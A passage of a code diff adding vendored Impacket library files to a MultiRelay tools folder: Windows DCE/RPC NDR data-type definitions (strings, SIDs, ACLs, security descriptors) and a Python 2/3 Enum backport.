+                # if we could't decode it, we assume it is a raw buffer
+                return self.fields[key]
+        else:
+            return NDR.__getitem__(self,key)
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]
+
+class LPSTR(NDRPOINTER):
+    referent = (
+        ('Data', STR),
+    )
+
+class WSTR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)//2'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)//2'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)//2'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)//2'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]*2 
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class LPWSTR(NDRPOINTER):
+    referent = (
+        ('Data', WSTR),
+    )
+
+# 2.2.5 BSTR
+BSTR = LPWSTR
+
+# 2.2.8 DOUBLE
+DOUBLE = NDRDOUBLEFLOAT
+class PDOUBLE(NDRPOINTER):
+    referent = (
+        ('Data', DOUBLE),
+    )
+
+# 2.2.15 FLOAT
+FLOAT = NDRFLOAT
+class PFLOAT(NDRPOINTER):
+    referent = (
+        ('Data', FLOAT),
+    )
+
+# 2.2.18 HRESULT
+HRESULT = NDRLONG
+class PHRESULT(NDRPOINTER):
+    referent = (
+        ('Data', HRESULT),
+    )
+
+# 2.2.19 INT
+INT = NDRLONG
+class PINT(NDRPOINTER):
+    referent = (
+        ('Data', INT),
+    )
+
+# 2.2.26 LMSTR
+LMSTR = LPWSTR
+
+# 2.2.27 LONG
+LONG = NDRLONG
+class LPLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONG),
+    )
+
+PLONG = LPLONG
+
+# 2.2.28 LONGLONG
+LONGLONG = NDRHYPER
+
+class PLONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONGLONG),
+    )
+
+# 2.2.31 LONG64
+LONG64 = NDRUHYPER
+class PLONG64(NDRPOINTER):
+    referent = (
+        ('Data', LONG64),
+    )
+
+# 2.2.32 LPCSTR
+LPCSTR = LPSTR
+
+# 2.2.36 NET_API_STATUS
+NET_API_STATUS = DWORD
+
+# 2.2.52 ULONG_PTR
+ULONG_PTR = NDRULONG
+# 2.2.10 DWORD_PTR
+DWORD_PTR = ULONG_PTR
+
+# 2.3.2 GUID and UUID
+class GUID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 4
+
+class PGUID(NDRPOINTER):
+    referent = (
+        ('Data', GUID),
+    )
+
+UUID = GUID
+PUUID = PGUID
+
+# 2.2.37 NTSTATUS
+NTSTATUS = DWORD
+
+# 2.2.45 UINT
+UINT = NDRULONG
+class PUINT(NDRPOINTER):
+    referent = (
+        ('Data', UINT),
+    )
+
+# 2.2.50 ULONG
+ULONG = NDRULONG
+class PULONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONG),
+    )
+
+LPULONG = PULONG
+
+# 2.2.54 ULONGLONG
+ULONGLONG = NDRUHYPER
+class PULONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONGLONG),
+    )
+
+# 2.2.57 USHORT
+USHORT = NDRUSHORT
+class PUSHORT(NDRPOINTER):
+    referent = (
+        ('Data', USHORT),
+    )
+
+# 2.2.59 WCHAR
+WCHAR = WSTR
+PWCHAR = LPWSTR
+
+# 2.2.61 WORD
+WORD = NDRUSHORT
+class PWORD(NDRPOINTER):
+    referent = (
+        ('Data', WORD),
+    )
+LPWORD = PWORD
+
+# 2.3.1 FILETIME
+class FILETIME(NDRSTRUCT):
+    structure = (
+        ('dwLowDateTime', DWORD),
+        ('dwHighDateTime', LONG),
+    )
+
+class PFILETIME(NDRPOINTER):
+    referent = (
+        ('Data', FILETIME),
+    )
+
+# 2.3.3 LARGE_INTEGER
+LARGE_INTEGER = NDRHYPER
+class PLARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', LARGE_INTEGER),
+    )
+
+# 2.3.5 LUID
+class LUID(NDRSTRUCT):
+    structure = (
+        ('LowPart', DWORD),
+        ('HighPart', LONG),
+    )
+
+# 2.3.8 RPC_UNICODE_STRING
+class RPC_UNICODE_STRING(NDRSTRUCT):
+    # Here we're doing some tricks to make this data type
+    # easier to use. It's exactly the same as defined. I changed the
+    # Buffer name for Data, so users can write directly to the datatype
+    # instead of writing to datatype['Buffer'].
+    # The drawback is you cannot directly access the Length and 
+    # MaximumLength fields. 
+    # If you really need it, you will need to do it this way:
+    # class TT(NDRCALL):
+    # structure = (
+    #     ('str1', RPC_UNICODE_STRING),
+    #  )
+    # 
+    # nn = TT()
+    # nn.fields['str1'].fields['MaximumLength'] = 30
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPWSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            try:
+                value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                value = value.decode(sys.getfilesystemencoding())
+            self['Length'] = len(value)*2
+            self['MaximumLength'] = len(value)*2
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+class PRPC_UNICODE_STRING(NDRPOINTER):
+    referent = (
+       ('Data', RPC_UNICODE_STRING ),
+    )
+
+# 2.3.9 OBJECT_TYPE_LIST
+ACCESS_MASK = DWORD
+class OBJECT_TYPE_LIST(NDRSTRUCT):
+    structure = (
+        ('Level', WORD),
+        ('Remaining',ACCESS_MASK),
+        ('ObjectType',PGUID),
+    )
+
+class POBJECT_TYPE_LIST(NDRPOINTER):
+    referent = (
+       ('Data', OBJECT_TYPE_LIST ),
+    )
+
+# 2.3.13 SYSTEMTIME
+class SYSTEMTIME(NDRSTRUCT):
+    structure = (
+        ('wYear', WORD),
+        ('wMonth', WORD),
+        ('wDayOfWeek', WORD),
+        ('wDay', WORD),
+        ('wHour', WORD),
+        ('wMinute', WORD),
+        ('wSecond', WORD),
+        ('wMilliseconds', WORD),
+    )
+
+class PSYSTEMTIME(NDRPOINTER):
+    referent = (
+       ('Data', SYSTEMTIME ),
+    )
+
+# 2.3.15 ULARGE_INTEGER
+class ULARGE_INTEGER(NDRSTRUCT):
+    structure = (
+        ('QuadPart', LONG64),
+    )
+
+class PULARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', ULARGE_INTEGER),
+    )
+
+# 2.4.2.3 RPC_SID
+class DWORD_ARRAY(NDRUniConformantArray):
+    item = '<L'
+
+class RPC_SID_IDENTIFIER_AUTHORITY(NDRUniFixedArray):
+    align = 1
+    align64 = 1
+    def getDataLen(self, data, offset=0):
+        return 6
+
+class RPC_SID(NDRSTRUCT):
+    structure = (
+        ('Revision',NDRSMALL),
+        ('SubAuthorityCount',NDRSMALL),
+        ('IdentifierAuthority',RPC_SID_IDENTIFIER_AUTHORITY),
+        ('SubAuthority',DWORD_ARRAY),
+    )
+    def getData(self, soFar = 0):
+        self['SubAuthorityCount'] = len(self['SubAuthority'])
+        return NDRSTRUCT.getData(self, soFar)
+
+    def fromCanonical(self, canonical):
+        items = canonical.split('-')
+        self['Revision'] = int(items[1])
+        self['IdentifierAuthority'] = b'\x00\x00\x00\x00\x00' + pack('B',int(items[2]))
+        self['SubAuthorityCount'] = len(items) - 3
+        for i in range(self['SubAuthorityCount']):
+            self['SubAuthority'].append(int(items[i+3]))
+
+    def formatCanonical(self):
+        ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority'][5:6]))
+        for i in range(self['SubAuthorityCount']):
+            ans += '-%d' % self['SubAuthority'][i]
+        return ans
+
+class PRPC_SID(NDRPOINTER):
+    referent = (
+        ('Data', RPC_SID),
+    )
+
+PSID = PRPC_SID
+
+# 2.4.3 ACCESS_MASK
+GENERIC_READ            = 0x80000000
+GENERIC_WRITE           = 0x40000000
+GENERIC_EXECUTE         = 0x20000000
+GENERIC_ALL             = 0x10000000
+MAXIMUM_ALLOWED         = 0x02000000
+ACCESS_SYSTEM_SECURITY  = 0x01000000
+SYNCHRONIZE             = 0x00100000
+WRITE_OWNER             = 0x00080000
+WRITE_DACL              = 0x00040000
+READ_CONTROL            = 0x00020000
+DELETE                  = 0x00010000
+
+# 2.4.5.1 ACL--RPC Representation
+class ACL(NDRSTRUCT):
+    structure = (
+        ('AclRevision',NDRSMALL),
+        ('Sbz1',NDRSMALL),
+        ('AclSize',NDRSHORT),
+        ('AceCount',NDRSHORT),
+        ('Sbz2',NDRSHORT),
+    )
+
+class PACL(NDRPOINTER):
+    referent = (
+        ('Data', ACL),
+    )
+
+# 2.4.6.1 SECURITY_DESCRIPTOR--RPC Representation
+class SECURITY_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Revision',UCHAR),
+        ('Sbz1',UCHAR),
+        ('Control',USHORT),
+        ('Owner',PSID),
+        ('Group',PSID),
+        ('Sacl',PACL),
+        ('Dacl',PACL),
+    )
+
+# 2.4.7 SECURITY_INFORMATION
+OWNER_SECURITY_INFORMATION            = 0x00000001
+GROUP_SECURITY_INFORMATION            = 0x00000002
+DACL_SECURITY_INFORMATION             = 0x00000004
+SACL_SECURITY_INFORMATION             = 0x00000008
+LABEL_SECURITY_INFORMATION            = 0x00000010
+UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000
+UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000
+PROTECTED_SACL_SECURITY_INFORMATION   = 0x40000000
+PROTECTED_DACL_SECURITY_INFORMATION   = 0x80000000
+ATTRIBUTE_SECURITY_INFORMATION        = 0x00000020
+SCOPE_SECURITY_INFORMATION            = 0x00000040
+BACKUP_SECURITY_INFORMATION           = 0x00010000
+
+SECURITY_INFORMATION = DWORD
+class PSECURITY_INFORMATION(NDRPOINTER):
+    referent = (
+        ('Data', SECURITY_INFORMATION),
+    )

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/enum.py

@@ -0,0 +1,754 @@
+"""Python Enumerations"""
+
+import sys as _sys
+
+__all__ = ['Enum', 'IntEnum', 'unique']
+
+pyver = float('%s.%s' % _sys.version_info[:2])
+
+try:
+    any
+except NameError:
+    def any(iterable):
+        for element in iterable:
+            if element:
+                return True
+        return False
+
+
+class _RouteClassAttributeToGetattr(object):
+    """Route attribute access on a class to __getattr__.
+
+    This is a descriptor, used to define attributes that act differently when
+    accessed through an instance and through a class.  Instance access remains
+    normal, but access to an attribute through a class will be routed to the
+    class's __getattr__ method; this is done by raising AttributeError.
+
+    """
+    def __init__(self, fget=None):
+        self.fget = fget
+
+    def __get__(self, instance, ownerclass=None):
+        if instance is None:
+            raise AttributeError()
+        return self.fget(instance)
+
+    def __set__(self, instance, value):
+        raise AttributeError("can't set attribute")
+
+    def __delete__(self, instance):
+        raise AttributeError("can't delete attribute")
+
+
+def _is_descriptor(obj):
+    """Returns True if obj is a descriptor, False otherwise."""
+    return (
+            hasattr(obj, '__get__') or
+            hasattr(obj, '__set__') or
+            hasattr(obj, '__delete__'))
+
+
+def _is_dunder(name):
+    """Returns True if a __dunder__ name, False otherwise."""
+    return (name[:2] == name[-2:] == '__' and
+            name[2:3] != '_' and
+            name[-3:-2] != '_' and
+            len(name) > 4)
+
+
+def _is_sunder(name):
+    """Returns True if a _sunder_ name, False otherwise."""
+    return (name[0] == name[-1] == '_' and 
+            name[1:2] != '_' and
+            name[-2:-1] != '_' and
+            len(name) > 2)
+
+
+def _make_class_unpicklable(cls):
+    """Make the given class un-picklable."""
+    def _break_on_call_reduce(self):
+        raise TypeError('%r cannot be pickled' % self)
+    cls.__reduce__ = _break_on_call_reduce
+    cls.__module__ = '<unknown>'
+
+
+class _EnumDict(dict):
+    """Track enum member order and ensure member names are not reused.
+
+    EnumMeta will use the names found in self._member_names as the
+    enumeration member names.
+
+    """
+    def __init__(self):
+        super(_EnumDict, self).__init__()
+        self._member_names = []
+
+    def __setitem__(self, key, value):
+        """Changes anything not dundered or not a descriptor.
+
+        If a descriptor is added with the same name as an enum member, the name
+        is removed from _member_names (this may leave a hole in the numerical
+        sequence of values).
+
+        If an enum member name is used twice, an error is raised; duplicate
+        values are not checked for.
+
+        Single underscore (sunder) names are reserved.
+
+        Note:   in 3.x __order__ is simply discarded as a not necessary piece
+                leftover from 2.x
+
+        """
+        if pyver >= 3.0 and key == '__order__':
+                return
+        if _is_sunder(key):
+            raise ValueError('_names_ are reserved for future Enum use')
+        elif _is_dunder(key):
+            pass
+        elif key in self._member_names:
+            # descriptor overwriting an enum?
+            raise TypeError('Attempted to reuse key: %r' % key)
+        elif not _is_descriptor(value):
+            if key in self:
+                # enum overwriting a descriptor?
+                raise TypeError('Key already defined as: %r' % self[key])
+            self._member_names.append(key)
+        super(_EnumDict, self).__setitem__(key, value)
+
+
+# Dummy value for Enum as EnumMeta explicitly checks for it, but of course until
+# EnumMeta finishes running the first time the Enum class doesn't exist.  This
+# is also why there are checks in EnumMeta like `if Enum is not None`
+Enum = None
+
+
+class EnumMeta(type):
+    """Metaclass for Enum"""
+    @classmethod
+    def __prepare__(metacls, cls, bases):
+        return _EnumDict()
+
+    def __new__(metacls, cls, bases, classdict):
+        # an Enum class is final once enumeration items have been defined; it
+        # cannot be mixed with other types (int, float, etc.) if it has an
+        # inherited __new__ unless a new __new__ is defined (or the resulting
+        # class will fail).
+        if type(classdict) is dict:
+            original_dict = classdict
+            classdict = _EnumDict()
+            for k, v in original_dict.items():
+                classdict[k] = v
+
+        member_type, first_enum = metacls._get_mixins_(bases)
+        #if member_type is object:
+        #    use_args = False
+        #else:
+        #    use_args = True
+        __new__, save_new, use_args = metacls._find_new_(classdict, member_type,
+                                                        first_enum)
+        # save enum items into separate mapping so they don't get baked into
+        # the new class
+        members = dict((k, classdict[k]) for k in classdict._member_names)
+        for name in classdict._member_names:
+            del classdict[name]
+
+        # py2 support for definition order
+        __order__ = classdict.get('__order__')
+        if __order__ is None:
+            __order__ = classdict._member_names
+            if pyver < 3.0:
+                order_specified = False
+            else:
+                order_specified = True
+        else:
+            del classdict['__order__']
+            order_specified = True
+            if pyver < 3.0:
+                __order__ = __order__.replace(',', ' ').split()
+                aliases = [name for name in members if name not in __order__]
+                __order__ += aliases
+
+        # check for illegal enum names (any others?)
+        invalid_names = set(members) & set(['mro'])
+        if invalid_names:
+            raise ValueError('Invalid enum member name(s): %s' % (
+                ', '.join(invalid_names), ))
+
+        # create our new Enum type
+        enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict)
+        enum_class._member_names_ = []               # names in random order
+        enum_class._member_map_ = {}                 # name->value map
+        enum_class._member_type_ = member_type
+
+        # Reverse value->name map for hashable values.
+        enum_class._value2member_map_ = {}
+
+        # check for a __getnewargs__, and if not present sabotage
+        # pickling, since it won't work anyway
+        if (member_type is not object and
+            member_type.__dict__.get('__getnewargs__') is None
+            ):
+            _make_class_unpicklable(enum_class)
+
+        # instantiate them, checking for duplicates as we go
+        # we instantiate first instead of checking for duplicates first in case
+        # a custom __new__ is doing something funky with the values -- such as
+        # auto-numbering ;)
+        if __new__ is None:
+            __new__ = enum_class.__new__
+        for member_name in __order__:
+            value = members[member_name]
+            if not isinstance(value, tuple):
+                args = (value, )
+            else:
+                args = value
+            if member_type is tuple:   # special case for tuple enums
+                args = (args, )     # wrap it one more time
+            if not use_args or not args:
+                enum_member = __new__(enum_class)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = value
+            else:
+                enum_member = __new__(enum_class, *args)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = member_type(*args)
+            value = enum_member._value_
+            enum_member._name_ = member_name
+            enum_member.__objclass__ = enum_class
+            enum_member.__init__(*args)
+            # If another member with the same value was already defined, the
+            # new member becomes an alias to the existing one.
+            for name, canonical_member in enum_class._member_map_.items():
+                if canonical_member.value == enum_member._value_:
+                    enum_member = canonical_member
+                    break
+            else:
+                # Aliases don't appear in member names (only in __members__).
+                enum_class._member_names_.append(member_name)
+            enum_class._member_map_[member_name] = enum_member
+            try:
+                # This may fail if value is not hashable. We can't add the value
+                # to the map, and by-value lookups for this value will be
+                # linear.
+                enum_class._value2member_map_[value] = enum_member
+            except TypeError:
+                pass
+
+        # in Python2.x we cannot know definition order, so go with value order
+        # unless __order__ was specified in the class definition
+        if not order_specified:
+            enum_class._member_names_ = [
+                e[0] for e in sorted(
+                [(name, enum_class._member_map_[name]) for name in enum_class._member_names_],
+                 key=lambda t: t[1]._value_
+                        )]
+
+        # double check that repr and friends are not the mixin's or various
+        # things break (such as pickle)
+        if Enum is not None:
+            setattr(enum_class, '__getnewargs__', Enum.__getnewargs__)
+        for name in ('__repr__', '__str__', '__format__'):
+            class_method = getattr(enum_class, name)
+            obj_method = getattr(member_type, name, None)
+            enum_method = getattr(first_enum, name, None)
+            if obj_method is not None and obj_method is class_method:
+                setattr(enum_class, name, enum_method)
+
+        # method resolution and int's are not playing nice
+        # Python's less than 2.6 use __cmp__
+
+        if pyver < 2.6:
+
+            if issubclass(enum_class, int):
+                setattr(enum_class, '__cmp__', getattr(int, '__cmp__'))
+
+        elif pyver < 3.0:
+
+            if issubclass(enum_class, int):
+                for method in (
+                        '__le__',
+                        '__lt__',
+                        '__gt__',
+                        '__ge__',
+                        '__eq__',
+                        '__ne__',
+                        '__hash__',
+                        ):
+                    setattr(enum_class, method, getattr(int, method))
+
+        # replace any other __new__ with our own (as long as Enum is not None,
+        # anyway) -- again, this is to support pickle
+        if Enum is not None:
+            # if the user defined their own __new__, save it before it gets
+            # clobbered in case they subclass later
+            if save_new:
+                setattr(enum_class, '__member_new__', enum_class.__dict__['__new__'])
+            setattr(enum_class, '__new__', Enum.__dict__['__new__'])
+        return enum_class
+
+    def __call__(cls, value, names=None, module=None, type=None):
+        """Either returns an existing member, or creates a new enum class.
+
+        This method is used both when an enum class is given a value to match
+        to an enumeration member (i.e. Color(3)) and for the functional API
+        (i.e. Color = Enum('Color', names='red green blue')).
+
+        When used for the functional API: `module`, if set, will be stored in
+        the new class' __module__ attribute; `type`, if set, will be mixed in
+        as the first base class.
+
+        Note: if `module` is not set this routine will attempt to discover the
+        calling module by walking the frame stack; if this is unsuccessful
+        the resulting class will not be pickleable.
+
+        """
+        if names is None:  # simple value lookup
+            return cls.__new__(cls, value)
+        # otherwise, functional API: we're creating a new Enum type
+        return cls._create_(value, names, module=module, type=type)
+
+    def __contains__(cls, member):
+        return isinstance(member, cls) and member.name in cls._member_map_
+
+    def __delattr__(cls, attr):
+        # nicer error message when someone tries to delete an attribute
+        # (see issue19025).
+        if attr in cls._member_map_:
+            raise AttributeError(
+                    "%s: cannot delete Enum member." % cls.__name__)
+        super(EnumMeta, cls).__delattr__(attr)
+
+    def __dir__(self):
+        return (['__class__', '__doc__', '__members__', '__module__'] +
+                self._member_names_)
+
+    @property
+    def __members__(cls):
+        """Returns a mapping of member name->value.
+
+        This mapping lists all enum members, including aliases. Note that this
+        is a copy of the internal mapping.
+
+        """
+        return cls._member_map_.copy()
+
+    def __getattr__(cls, name):
+        """Return the enum member matching `name`
+
+        We use __getattr__ instead of descriptors or inserting into the enum
+        class' __dict__ in order to support `name` and `value` being both
+        properties for enum members (which live in the class' __dict__) and
+        enum members themselves.
+
+        """
+        if _is_dunder(name):
+            raise AttributeError(name)
+        try:
+            return cls._member_map_[name]
+        except KeyError:
+            raise AttributeError(name)
+
+    def __getitem__(cls, name):
+        return cls._member_map_[name]
+
+    def __iter__(cls):
+        return (cls._member_map_[name] for name in cls._member_names_)
+
+    def __reversed__(cls):
+        return (cls._member_map_[name] for name in reversed(cls._member_names_))
+
+    def __len__(cls):
+        return len(cls._member_names_)
+
+    def __repr__(cls):
+        return "<enum %r>" % cls.__name__
+
+    def __setattr__(cls, name, value):
+        """Block attempts to reassign Enum members.
+
+        A simple assignment to the class namespace only changes one of the
+        several possible ways to get an Enum member from the Enum class,
+        resulting in an inconsistent Enumeration.
+
+        """
+        member_map = cls.__dict__.get('_member_map_', {})
+        if name in member_map:
+            raise AttributeError('Cannot reassign members.')
+        super(EnumMeta, cls).__setattr__(name, value)
+
+    def _create_(cls, class_name, names=None, module=None, type=None):
+        """Convenience method to create a new Enum class.
+
+        `names` can be:
+
+        * A string containing member names, separated either with spaces or
+          commas.  Values are auto-numbered from 1.
+        * An iterable of member names.  Values are auto-numbered from 1.
+        * An iterable of (member name, value) pairs.
+        * A mapping of member name -> value.
+
+        """
+        metacls = cls.__class__
+        if type is None:
+            bases = (cls, )
+        else:
+            bases = (type, cls)
+        classdict = metacls.__prepare__(class_name, bases)
+        __order__ = []
+
+        # special processing needed for names?
+        if isinstance(names, str):
+            names = names.replace(',', ' ').split()
+        if isinstance(names, (tuple, list)) and isinstance(names[0], str):
+            names = [(e, i+1) for (i, e) in enumerate(names)]
+
+        # Here, names is either an iterable of (name, value) or a mapping.
+        for item in names:
+            if isinstance(item, str):
+                member_name, member_value = item, names[item]
+            else:
+                member_name, member_value = item
+            classdict[member_name] = member_value
+            __order__.append(member_name)
+        # only set __order__ in classdict if name/value was not from a mapping
+        if not isinstance(item, str):
+            classdict['__order__'] = ' '.join(__order__)
+        enum_class = metacls.__new__(metacls, class_name, bases, classdict)
+
+        # TODO: replace the frame hack if a blessed way to know the calling
+        # module is ever developed
+        if module is None:
+            try:
+                module = _sys._getframe(2).f_globals['__name__']
+            except (AttributeError, ValueError):
+                pass
+        if module is None:
+            _make_class_unpicklable(enum_class)
+        else:
+            enum_class.__module__ = module
+
+        return enum_class
+
+    @staticmethod
+    def _get_mixins_(bases):
+        """Returns the type for creating enum members, and the first inherited
+        enum class.
+
+        bases: the tuple of bases that was given to __new__
+
+        """
+        if not bases or Enum is None:
+            return object, Enum
+        
+
+        # double check that we are not subclassing a class with existing
+        # enumeration members; while we're at it, see if any other data
+        # type has been mixed in so we can use the correct __new__
+        member_type = first_enum = None
+        for base in bases:
+            if  (base is not Enum and
+                    issubclass(base, Enum) and
+                    base._member_names_):
+                raise TypeError("Cannot extend enumerations")
+        # base is now the last base in bases
+        if not issubclass(base, Enum):
+            raise TypeError("new enumerations must be created as "
+                    "`ClassName([mixin_type,] enum_type)`")
+
+        # get correct mix-in type (either mix-in type of Enum subclass, or
+        # first base if last base is Enum)
+        if not issubclass(bases[0], Enum):
+            member_type = bases[0]     # first data type
+            first_enum = bases[-1]  # enum type
+        else:
+            for base in bases[0].__mro__:
+                # most common: (IntEnum, int, Enum, object)
+                # possible:    (<Enum 'AutoIntEnum'>, <Enum 'IntEnum'>,
+                #               <class 'int'>, <Enum 'Enum'>,
+                #               <class 'object'>)
+                if issubclass(base, Enum):
+                    if first_enum is None:
+                        first_enum = base
+                else:
+                    if member_type is None:
+                        member_type = base
+
+        return member_type, first_enum
+
+    if pyver < 3.0:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+            if __new__:
+                return None, True, True      # __new__, save_new, use_args
+
+            N__new__ = getattr(None, '__new__')
+            O__new__ = getattr(object, '__new__')
+            if Enum is None:
+                E__new__ = N__new__
+            else:
+                E__new__ = Enum.__dict__['__new__']
+            # check all possibles for __member_new__ before falling back to
+            # __new__
+            for method in ('__member_new__', '__new__'):
+                for possible in (member_type, first_enum):
+                    try:
+                        target = possible.__dict__[method]
+                    except (AttributeError, KeyError):
+                        target = getattr(possible, method, None)
+                    if target not in [
+                            None,
+                            N__new__,
+                            O__new__,
+                            E__new__,
+                            ]:
+                        if method == '__member_new__':
+                            classdict['__new__'] = target
+                            return None, False, True
+                        if isinstance(target, staticmethod):
+                            target = target.__get__(member_type)
+                        __new__ = target
+                        break
+                if __new__ is not None:
+                    break
+            else:
+                __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, False, use_args
+    else:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+
+            # should __new__ be saved as __member_new__ later?
+            save_new = __new__ is not None
+
+            if __new__ is None:
+                # check all possibles for __member_new__ before falling back to
+                # __new__
+                for method in ('__member_new__', '__new__'):
+                    for possible in (member_type, first_enum):
+                        target = getattr(possible, method, None)
+                        if target not in (
+                                None,
+                                None.__new__,
+                                object.__new__,
+                                Enum.__new__,
+                                ):
+                            __new__ = target
+                            break
+                    if __new__ is not None:
+                        break
+                else:
+                    __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, save_new, use_args
+
+
+########################################################
+# In order to support Python 2 and 3 with a single
+# codebase we have to create the Enum methods separately
+# and then use the `type(name, bases, dict)` method to
+# create the class.
+########################################################
+temp_enum_dict = {}
+temp_enum_dict['__doc__'] = "Generic enumeration.\n\n    Derive from this class to define new enumerations.\n\n"
+
+def __new__(cls, value):
+    # all enum instances are actually created during class construction
+    # without calling this method; this method is called by the metaclass'
+    # __call__ (i.e. Color(3) ), and by pickle
+    if type(value) is cls:
+        # For lookups like Color(Color.red)
+        value = value.value
+        #return value
+    # by-value search for a matching enum member
+    # see if it's in the reverse mapping (for hashable values)
+    try:
+        if value in cls._value2member_map_:
+            return cls._value2member_map_[value]
+    except TypeError:
+        # not there, now do long search -- O(n) behavior
+        for member in cls._member_map_.values():
+            if member.value == value:
+                return member
+    raise ValueError("%s is not a valid %s" % (value, cls.__name__))
+temp_enum_dict['__new__'] = __new__
+del __new__
+
+def __repr__(self):
+    return "<%s.%s: %r>" % (
+            self.__class__.__name__, self._name_, self._value_)
+temp_enum_dict['__repr__'] = __repr__
+del __repr__
+
+def __str__(self):
+    return "%s.%s" % (self.__class__.__name__, self._name_)
+temp_enum_dict['__str__'] = __str__
+del __str__
+
+def __dir__(self):
+    added_behavior = [m for m in self.__class__.__dict__ if m[0] != '_']
+    return (['__class__', '__doc__', '__module__', 'name', 'value'] + added_behavior)
+temp_enum_dict['__dir__'] = __dir__
+del __dir__
+
+def __format__(self, format_spec):
+    # mixed-in Enums should use the mixed-in type's __format__, otherwise
+    # we can get strange results with the Enum name showing up instead of
+    # the value
+
+    # pure Enum branch
+    if self._member_type_ is object:
+        cls = str
+        val = str(self)
+    # mix-in branch
+    else:
+        cls = self._member_type_
+        val = self.value
+    return cls.__format__(val, format_spec)
+temp_enum_dict['__format__'] = __format__
+del __format__
+
+
+####################################
+# Python's less than 2.6 use __cmp__
+
+if pyver < 2.6:
+
+    def __cmp__(self, other):
+        if type(other) is self.__class__:
+            if self is other:
+                return 0
+            return -1
+        return NotImplemented
+        raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__cmp__'] = __cmp__
+    del __cmp__
+
+else:
+
+    def __le__(self, other):
+        raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__le__'] = __le__
+    del __le__
+
+    def __lt__(self, other):
+        raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__lt__'] = __lt__
+    del __lt__
+
+    def __ge__(self, other):
+        raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__ge__'] = __ge__
+    del __ge__
+
+    def __gt__(self, other):
+        raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__gt__'] = __gt__
+    del __gt__
+    
+
+def __eq__(self, other):
+    if type(other) is self.__class__:
+        return self is other
+    return NotImplemented
+temp_enum_dict['__eq__'] = __eq__
+del __eq__
+
+def __ne__(self, other):
+    if type(other) is self.__class__:
+        return self is not other
+    return NotImplemented
+temp_enum_dict['__ne__'] = __ne__
+del __ne__
+
+def __getnewargs__(self):
+    return (self._value_, )
+temp_enum_dict['__getnewargs__'] = __getnewargs__
+del __getnewargs__
+
+def __hash__(self):
+    return hash(self._name_)
